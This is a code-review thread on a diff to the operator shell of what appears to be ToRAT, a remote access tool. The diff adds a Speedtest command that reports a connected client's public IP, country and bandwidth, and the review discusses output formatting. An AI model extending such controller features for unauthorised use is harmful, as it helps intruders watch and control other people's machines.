torat_server/client_ishell.go

```diff
@@ -257,10 +262,26 @@ func (client *activeClient) Shred(c *ishell.Context) {
 	}
 }
 
-// ping something?
-// TODO: I don't think this feature works
-func (client *activeClient) Ping(c *ishell.Context) error {
-	return client.RPC.Call("API.Ping", void, &void)
+// Speedtest the clients internet connection
+func (client *activeClient) Speedtest(c *ishell.Context) {
+	c.ProgressBar().Indeterminate(true)
+	c.ProgressBar().Start()
+
+	r := shared.Speedtest{}
+	if err := client.RPC.Call("API.Speedtest", void, &r); err != nil {
+		c.ProgressBar().Final(yellow("["+client.Client.Name+"] ") + red("[!] Could not perform speedtest on client!"))
+		c.ProgressBar().Final(yellow("["+client.Client.Name+"] ") + red("[!] ", err))
+		return
+	}
+
+	c.ProgressBar().Final(yellow("["+client.Client.Name+"] ") + green("[+] Speedtest finished"))
```

Comment:
`c.Println("foo", "bar")` already adds a space in between arguments, so rework the `+` to `,` and remove the trailing space from the string.

There are also other similar cases please rework those too.

Reply:
I think you miss understand what those spaces are for. That aligns the text so the output looks like this

```
[vBHv3Vc5awx39ivu] [+] Speedtest finished
Public IP:  XXX.XXX.XXX.XXX
Country:    United States
Ping:       42.247103ms
Download:   205.99917583350827
Upload:     10.98382888752083
```